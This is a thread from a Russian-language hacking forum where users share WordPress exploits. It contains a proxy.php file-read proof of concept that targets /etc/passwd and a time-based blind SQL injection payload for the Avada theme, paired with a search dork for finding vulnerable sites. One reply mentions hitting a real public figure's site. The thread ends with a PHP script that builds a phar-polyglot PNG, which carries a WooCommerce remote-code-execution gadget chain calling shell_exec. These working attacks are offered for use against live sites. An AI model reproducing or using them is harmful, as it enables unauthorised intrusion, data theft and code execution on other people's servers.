Старый 10.07.2015, 14:46   #61
Sleep
 
Регистрация: 29.04.2012
Сообщений: 17
Репутация: 4
По умолчанию

WP 3D Twitter Wall
Чтение файлов
Код:
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);
POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd
Sleep вне форума   Ответить с цитированием
Старый 01.03.2016, 01:21   #62
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Avada #1 Selling Theme of All Time (190,000+ Satisfied Customers)
inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) )


./includes/woo-config.php

PHP код:
        if ( isset( $_SERVER['QUERY_STRING'] ) ) {
            
parse_str$_SERVER['QUERY_STRING'], $params );
        }
        
$order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
        
$order strtoupper$order );

        
$args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}$wpdb->posts.post_date DESC"

Получается Time-Based Blind SQL Injection:
Цитата:
http://site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+ WHEN+ASCII(substring(version(),1,1))=53+THEN+SLEEP (0)+ELSE+SLEEP(1)+END+ASC+--+1
Оптимизации запроса от гуру приветствуются


В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.

Последний раз редактировалось crlf; 01.03.2016 в 01:40..
crlf вне форума   Ответить с цитированием
Старый 06.03.2016, 23:05   #63
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от crlf Посмотреть сообщение
Avada #1 Selling Theme of All Time (190,000+ Satisfied Customers)
inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) )


./includes/woo-config.php

PHP код:
        if ( isset( $_SERVER['QUERY_STRING'] ) ) {
            
parse_str$_SERVER['QUERY_STRING'], $params );
        }
        
$order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
        
$order strtoupper$order );

        
$args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}$wpdb->posts.post_date DESC"

Получается Time-Based Blind SQL Injection:

Оптимизации запроса от гуру приветствуются


В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.
Красавчик. Уязвимость есть даже на официальном сайте Конора Макгрегора
Но почему то в большинстве случаев через Sqlmap не крутятся эти sql, получить список таблиц через information_schema легко удаётся, а вот доступа к самим таблицам нету.
Просто хочу уточнить, это параноидальная защита вордпресса от SQL иньекций?
Нельзя даже выполнить запрос select count(*) from database.randprefix_wp_users
PS:
Код:
$order = strtoupper( $order );
может в этом дело?

Последний раз редактировалось Molofya; 06.03.2016 в 23:07..
Molofya вне форума   Ответить с цитированием
Старый 07.03.2016, 00:32   #64
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Цитата:
Сообщение от Molofya Посмотреть сообщение
может в этом дело?
Без понятия, попалась в текучке, нужно разбираться. Там где это требовалось, шоп не работал
crlf вне форума   Ответить с цитированием
Старый 22.08.2018, 14:22   #66
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Генератор "полезной" картинки для эксплоита бага из доклада File Operation Induced Unserialization via the “phar://” Stream Wrapper

Wordpress + WooCommerce RCE POP chain

PHP код:
<?php
 
class Requests_Utility_FilteredIterator extends ArrayIterator{
   
 protected 
$callback;
 
 public function 
__construct(){
    
$this->callback 'assert';
 }
 
}
 
class 
WC_Log_Handler_File{
 
 protected 
$handles;
 
 public function 
__construct(){
    
$this->handles = new Requests_Utility_FilteredIterator;
    
$this->handles[] = 'die(shell_exec("ls -la"));';
 }
 
}
 
function 
img(){
    
ob_start();
    
imagepng(imagecreatetruecolor(200200));
    return 
ob_get_clean();
}
 
$n 'image.phar';
$p = new Phar($n);
$p->setStub(img().'__HALT_COMPILER();');
$p->setMetadata(new WC_Log_Handler_File);
$p['x'] = '';
rename($n$n.'.png');
crlf вне форума   Ответить с цитированием
Ответ

Метки
auth bypass, уязвимости wordpress, wordpress, wordpress plugin vuln, wordpress vulnerabilities

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot